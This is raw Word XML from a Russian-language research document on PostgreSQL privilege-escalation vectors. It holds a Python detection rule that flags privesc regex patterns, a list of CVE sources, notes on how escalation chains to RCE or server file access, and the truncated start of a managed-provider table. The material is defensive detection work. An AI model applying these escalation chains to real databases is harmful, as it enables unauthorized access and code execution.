    <w:p w14:paraId="0D766239" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/services/judge/rules.py — добавить ветку в rules_audit():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2EED0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for key in (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B06DB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_set_role_app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CE7C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_schema_element",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03C9C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_function_index",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FC781" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_extension_create_app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F758A44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_secdef_no_searchpath",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46037C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_pg_catalog_function",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800690A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA78EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if _RE[key].search(sql_or_code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E0333" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        findings.append(VulnerabilityFinding(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D92F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            vulnerability_class=VulnerabilityClass.PRIVILEGE_ESCALATION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C23F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C7579" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            explanation="Паттерн потенциальной эскалации привилегий в "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D38C62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "PostgreSQL. Возможна цепочка к категории 3.7 (RCE) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD54E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "или 3.17 (RLS bypass).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E2E4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            suggested_fix="Уточните привилегии вызывающей роли, ownership "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F335D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "объектов в DDL, и наличие SET search_path в "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6521F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "SECURITY DEFINER функциях. См. 3.13.X для "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3F43D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "конкретных рекомендаций.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4DB242" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC6F9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20128126" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Risk 9 (не 10) потому, что эскалация — этап, не финальный урон; конкретный финал зависит от того, к какой 3.7.X-карточке ведёт chain. Поднять до 10 — при наличии корроборации с 3.7-паттернами в той же кодовой базе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1619B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A1FC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2024-10978 (SET ROLE / SET SESSION AUTHORIZATION reset-path): PostgreSQL Project Security Advisory, NIST NVD, PostgreSQL Release notes 17.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE1A5B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2023-2454 (schema_element search_path bypass): PostgreSQL Project Security Advisory, cve.news разбор, PostgreSQL Release notes 15.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EC73A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2022-1552 (autovacuum SRO bypass): PostgreSQL Project Security Advisory, PostgreSQL Release notes 14.3, PostgreSQL 17 release notes (pg_maintain mitigation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784DD7EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2022-2625 (extension scripts ownership): PostgreSQL Project Security Advisory, EDB разбор «PostgreSQL extensions impacted by CVE-2022-2625», PostgreSQL Release notes 14.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61B9D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Trusted extensions class (R28-chain): PostgreSQL Docs CREATE EXTENSION, Severalnines «24 trusted in PG13», dbi-services, pgPedia trusted-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>extension. Open question 8 в research.md: точный список trusted для PG 14-17 не зафиксирован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922B0F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Docs (SECURITY DEFINER, schema search_path), PostgreSQL Wiki (search_path attacks, CVE-2018-1058 контекст), PortSwigger Web Security Academy (общая методика).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EAC680" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDD1C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — куда эскалируют все шесть векторов 3.13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F57864" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.13.1 → 3.7.1 (если targeted role имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79185789" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.13.2 / 3.13.3 / 3.13.4 / 3.13.6 → 3.7.1 / 3.7.2a / 3.7.3 (если admin = superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E3205A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.13.5 chain 1 → 3.7.2b (CVE-2024-10979)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CE0A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17 RLS-обходы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.13.1 (CVE-2024-10978) пересекается с 3.17.3. Граница: 3.13.1 — горизонтальная эскалация ролей; 3.17.3 — обход RLS-policy через тот же баг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37235D35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3 / 3.6.4 file r/w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> часто получают через 3.13.X. Граница: 3.6 — что делать с привилегией; 3.13 — как её получить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB7B5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива стакингу для DDL-инъекций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D789911" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связана с 3.13.6 общей моделью угроз (search_path hijack через неполную квалификацию).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26950BCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 (Хронология 2022)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2022-1552, CVE-2022-2625 — летние fixes 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF27D28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 (Хронология 2023)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2023-2454 — майский fix 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B83E85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 (Хронология 2024)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2024-10978, CVE-2024-10979, CVE-2024-10976, CVE-2024-10977 — batch 14.11.2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72437018" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общие рекомендации по management ролей: исключить GRANT-цепочки, ограничить CREATE on public/database, явный SET search_path во всех SECURITY DEFINER функциях, аудит SECURITY DEFINER в кодбазе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20304B9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Расширения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекомендации по trusted-extension management в production (3.13.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D1D2D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791CE1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Поведение для каждого вектора в managed-PostgreSQL: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6"/>
        <w:gridCol w:w="1185"/>
        <w:gridCol w:w="1986"/>
        <w:gridCol w:w="1552"/>
        <w:gridCol w:w="1626"/>
        <w:gridCol w:w="1923"/>
        <w:gridCol w:w="1342"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="299DB98C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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F9CB98D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Провайдер</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A872498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.1 (SET ROLE)</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D93DB46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.2 (schema_element)</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C4FD03E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.3 (autovacuum)</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CF49CC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.4 (extension scripts)</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F2EAE33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.5 (trusted ext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337"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CDD8757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.6 (SECURITY DEFINER)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5EFE2CDA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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E3F864" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AWS RDS</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BCE793" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
